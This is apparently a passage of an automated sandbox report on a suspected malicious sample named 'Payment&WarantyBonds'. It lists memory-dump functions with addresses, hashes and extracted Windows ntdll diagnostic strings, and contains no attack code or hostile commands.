                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                                                                                                                • Instruction ID: fc31e7f02a8a40890cb3451a928e2727756a2e9aafbf7e913739ba5e04384054
                                                                                                                                                                                • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                                                                                                                • Instruction Fuzzy Hash: 10E0D831010A11DFE7366F2ED888B927BE5FF50711F148C2DE096925F0C7B89AC0CA41
                                                                                                                                                                                Function 01884000 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                                                                                                • Instruction ID: 08027123bd8e9850953a7c51b07afd565ca91c15a692746e3722e24ed883411c
                                                                                                                                                                                • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                                                                                                • Instruction Fuzzy Hash: D2E0AE353003068BE755DF1AC040B627BA6BFD5B10F28C068A9488F205EB32A9438A40
                                                                                                                                                                                Function 017F823B Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                                                                                                • Instruction ID: 782da1c92fa8cd9e8de83fe73ede3b0c21f34da1870808912682f2b0afa57547
                                                                                                                                                                                • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                                                                                                • Instruction Fuzzy Hash: A5E08C3600CA14EFDB322F19EC00B52B6A6FF64B60F24486DF182461A58B70A981CA46
                                                                                                                                                                                Function 01802050 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 5c371fe19c0f02968274f4be35a4decbd16c46c3e7b0b1556964ddd3461d3fc1
                                                                                                                                                                                • Instruction ID: c073c30274418a143fbea96cb04c4dbf4b5a3c0c45660f6266e3ff9b9da036da
                                                                                                                                                                                • Opcode Fuzzy Hash: 5c371fe19c0f02968274f4be35a4decbd16c46c3e7b0b1556964ddd3461d3fc1
                                                                                                                                                                                • Instruction Fuzzy Hash: F0E08C321004546BC222FA5DDD00E4A739EEFA4360F100225B150872E4CA64AE00C795
                                                                                                                                                                                Function 01838A90 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                                                                                                                                • Instruction ID: 2c99d07fe9e67412c0143d3c1b0ff0bee3b0bc0356cce3074dca48c7ddb6fdbe
                                                                                                                                                                                • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                                                                                                                                • Instruction Fuzzy Hash: C6E08633111A188BC729DE18D511B7277A4EF85720F09473EA61387780C534E544C7D5
                                                                                                                                                                                Function 01856AA4 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                                                                                                                                • Instruction ID: 5704e0b19bb6a22453a93e0ca92d7ef414617ec3b3485a23172eb2b3b9950ab4
                                                                                                                                                                                • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                                                                                                                                • Instruction Fuzzy Hash: 05D05E36511A50AFD3329F1BEA00C13BBF9FBC4B20705062EA94583924D670A906CBA0
                                                                                                                                                                                Function 0183E59C Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                                                                                                • Instruction ID: bdca75c346d67dab8759f530e338850822609c71b83b5507f8c565c305f2da61
                                                                                                                                                                                • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                                                                                                • Instruction Fuzzy Hash: 17D0A933614620ABD732AA1CFC00FC333E8BB88730F060459F018C7060C360EC81CA84
                                                                                                                                                                                Function 0187E908 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                                                                                                                • Instruction ID: 558510f8839cc8585801fb63234d2697ab9e0e32860be8b847b2456379e9c87d
                                                                                                                                                                                • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                                                                                                                • Instruction Fuzzy Hash: 05E0EC369506849BDF52DF5DCA40F5ABBB9BB94B40F150458A5089B660C624EA00CB40
                                                                                                                                                                                Function 017FA0E3 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                                                                                • Instruction ID: 0d848b8558f325a130f0f6f67e7361b5d887bae2d4c8786d9432ec2c37661216
                                                                                                                                                                                • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                                                                                • Instruction Fuzzy Hash: DAD0123321607197DB2956596954F67BA19EF81AA4F1A006D7A0ED3A04C5158C42D6E0
                                                                                                                                                                                Function 0183A830 Relevance: .0, Instructions: 14COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                                                                                                • Instruction ID: e68d03834cab99d76d2cec4bcf182754c342298f2b8eba97f138946365cc3c31
                                                                                                                                                                                • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                                                                                                • Instruction Fuzzy Hash: 04D012371D054DBBCB119F66DC01F957BA9E764BA0F444020B904C75A0D63AE950D584
                                                                                                                                                                                Function 0183CA24 Relevance: .0, Instructions: 14COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: c87b622b9e7ece6a4236543d5b1188b2b64cedcdf17742a516e45eca64655ec6
                                                                                                                                                                                • Instruction ID: 16329d031b68b93dc2a27f99636a4f04e1124e951bc974d9d0770472d2c28bc3
                                                                                                                                                                                • Opcode Fuzzy Hash: c87b622b9e7ece6a4236543d5b1188b2b64cedcdf17742a516e45eca64655ec6
                                                                                                                                                                                • Instruction Fuzzy Hash: 53D05230A010028BDF2BEB08CA54E2A3AB4FB50740B44006CEB00E2020E328DA028A80
                                                                                                                                                                                Function 018102A0 Relevance: .0, Instructions: 13COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                                                                                                • Instruction ID: 289b1eeff673886595a38afbb06ffe63dab3aaadfbb592b01b5b05349c54358a
                                                                                                                                                                                • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                                                                                                • Instruction Fuzzy Hash: 8FD0C936216E80CFD61BCB0CC9A4F5533A8BB44B44F814490F401CBB26D63CDA80CA00
                                                                                                                                                                                Function 0183C700 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                                                                                • Instruction ID: 863ef163e531ddc87b6d8c0843eb524d570e0816851fc5b7c10b6203c4764527
                                                                                                                                                                                • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                                                                                • Instruction Fuzzy Hash: 2CC01233290648AFC712AA99CD01F027BA9EBA8B50F000021F6048B670D631E920EA84
                                                                                                                                                                                Function 01820310 Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                                                                                • Instruction ID: ee1e5bf76feb05525783333f431e2b6d8002ac4286a9cef1114af0290c110af6
                                                                                                                                                                                • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                                                                                • Instruction Fuzzy Hash: EFD01236100248EFCB02DF45C890D9A772AFBD8710F108019FD19076108A31ED62DA90
                                                                                                                                                                                Function 01800750 Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                                                                                • Instruction ID: cbd8389e54cd17c3163537c45779d0b0a1fecf3235d4763f0c353d17e22f3cd0
                                                                                                                                                                                • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                                                                                • Instruction Fuzzy Hash: B5C04C757115418FCF15DB1DD694F4577E4F744750F150890EC45DB721E624EE01CA11
                                                                                                                                                                                Function 01842890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                                • API String ID: 48624451-2108815105
                                                                                                                                                                                • Opcode ID: 699260abc55db063fa12d63e8820083c8e3f163fcaf6abf6d543e4ffd133e1c5
                                                                                                                                                                                • Instruction ID: ac23de48fb500d35b4afcf67ba69a75185f83c6d14bf788d342e7f61133f3053
                                                                                                                                                                                • Opcode Fuzzy Hash: 699260abc55db063fa12d63e8820083c8e3f163fcaf6abf6d543e4ffd133e1c5
                                                                                                                                                                                • Instruction Fuzzy Hash: 0751F6B6A0411EBFDB11DBAC989097EFBB9BB083407148229F4A5D7642D734DF0087A0
                                                                                                                                                                                Function 018B2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                                • API String ID: 48624451-2108815105
                                                                                                                                                                                • Opcode ID: 4bf5bd5f7a77cdaacc0c494fd6cb0c675c5c171d6ff49ef11333654d7ce3e145
                                                                                                                                                                                • Instruction ID: 44c98392fce92e671d1afc68ff197d3865f8cab0129e0b2f09c605f4bcd57db0
                                                                                                                                                                                • Opcode Fuzzy Hash: 4bf5bd5f7a77cdaacc0c494fd6cb0c675c5c171d6ff49ef11333654d7ce3e145
                                                                                                                                                                                • Instruction Fuzzy Hash: 4251D5B1A00646AACB64DE5CC8D09BFB7BAEB44305B048459F5A6D7742D678EB40C760
                                                                                                                                                                                Function 01837630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01874742
                                                                                                                                                                                • Execute=1, xrefs: 01874713
                                                                                                                                                                                • ExecuteOptions, xrefs: 018746A0
                                                                                                                                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 018746FC
                                                                                                                                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01874655
                                                                                                                                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 01874787
                                                                                                                                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01874725
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                                • API String ID: 0-484625025
                                                                                                                                                                                • Opcode ID: ef1eee5da71aa3d60e20f6db1df3bd845dbdd36c4907c3e3bc885bf84dc66d40
                                                                                                                                                                                • Instruction ID: d190ed524e5e2cd3b87299e1ecf214e270e9aa7426c39b0242603323cefc47f3
                                                                                                                                                                                • Opcode Fuzzy Hash: ef1eee5da71aa3d60e20f6db1df3bd845dbdd36c4907c3e3bc885bf84dc66d40
                                                                                                                                                                                • Instruction Fuzzy Hash: 955119B160021E7BEF21EAA8DC95FA977A8EF58304F0800A9D605E7191EB70DF45DF91
                                                                                                                                                                                Function 018D6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                                                                                                • Instruction ID: ba76d158dbdbb6f84cbfa4108a3942450bfbb12440325b3bb6565cfb16109193
                                                                                                                                                                                • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                                                                                                • Instruction Fuzzy Hash: 3B021771508346AFD305CF18C490A6BBBE5FFC8714F648A2DF9858B254EB31EA05CB52
                                                                                                                                                                                Function 0184B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: __aulldvrm
                                                                                                                                                                                • String ID: +$-$0$0
                                                                                                                                                                                • API String ID: 1302938615-699404926
                                                                                                                                                                                • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                                                                • Instruction ID: f26c6fb16188348fba4d2f586a791c19bf612f9b85a0f072aa505761c421dbc2
                                                                                                                                                                                • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                                                                • Instruction Fuzzy Hash: 1E81AD70A0524D9FEF29CF6CC8917BEBBA2AF45360F18411AD861E7291CF34DA408B51
                                                                                                                                                                                Function 018B20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                                                                • String ID: %%%u$[$]:%u
                                                                                                                                                                                • API String ID: 48624451-2819853543
                                                                                                                                                                                • Opcode ID: 2bae25563fc3c2ada4bf629c73fdfca0e035a964dc398d8c7f7dbe8ed4e41a9a
                                                                                                                                                                                • Instruction ID: bc9caf8315a3c17b82cd9ac710b2cfe562dcca70f4cf4c4ad5cba1f846c714a8
                                                                                                                                                                                • Opcode Fuzzy Hash: 2bae25563fc3c2ada4bf629c73fdfca0e035a964dc398d8c7f7dbe8ed4e41a9a
                                                                                                                                                                                • Instruction Fuzzy Hash: A121367AA00519ABDB11DE6DD890AEEBBE9EF54754F44011AE955D3300E730FB028BA1
                                                                                                                                                                                Function 0182F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 018702E7
                                                                                                                                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 018702BD
                                                                                                                                                                                • RTL: Re-Waiting, xrefs: 0187031E
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                                                                • API String ID: 0-2474120054
                                                                                                                                                                                • Opcode ID: 5c7d235422a66f488d299de06dd2a628f3f8256f2a0dfb79140d956c4eb4763e
                                                                                                                                                                                • Instruction ID: 6a1c70253d347fe36c499c9dc22a0572d32c3bfd17c2090056a58199876cfa93
                                                                                                                                                                                • Opcode Fuzzy Hash: 5c7d235422a66f488d299de06dd2a628f3f8256f2a0dfb79140d956c4eb4763e
                                                                                                                                                                                • Instruction Fuzzy Hash: E0E19C316087569FD726CF28C884B2ABBF0AB85718F140A1DF6A5CB2D1D774DA84CB52
                                                                                                                                                                                Function 0183BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01877B7F
                                                                                                                                                                                • RTL: Re-Waiting, xrefs: 01877BAC
                                                                                                                                                                                • RTL: Resource at %p, xrefs: 01877B8E
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                • API String ID: 0-871070163
                                                                                                                                                                                • Opcode ID: 9d77171e277489cd6466c1b5445507e3882cc72a39731d7c0b8c5414460ad346
                                                                                                                                                                                • Instruction ID: e70e4bb5f82a35603c672f1dd19d73a32466306183061eaa08cfae3305ff5c70
                                                                                                                                                                                • Opcode Fuzzy Hash: 9d77171e277489cd6466c1b5445507e3882cc72a39731d7c0b8c5414460ad346
                                                                                                                                                                                • Instruction Fuzzy Hash: 4A41D4713047069FD724DE2DC840B6AB7E5EF99720F140A1DFA5ADB680DB31EA05CB92
                                                                                                                                                                                Function 0183B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0187728C
                                                                                                                                                                                Strings
                                                                                                                                                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01877294
                                                                                                                                                                                • RTL: Re-Waiting, xrefs: 018772C1
                                                                                                                                                                                • RTL: Resource at %p, xrefs: 018772A3
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
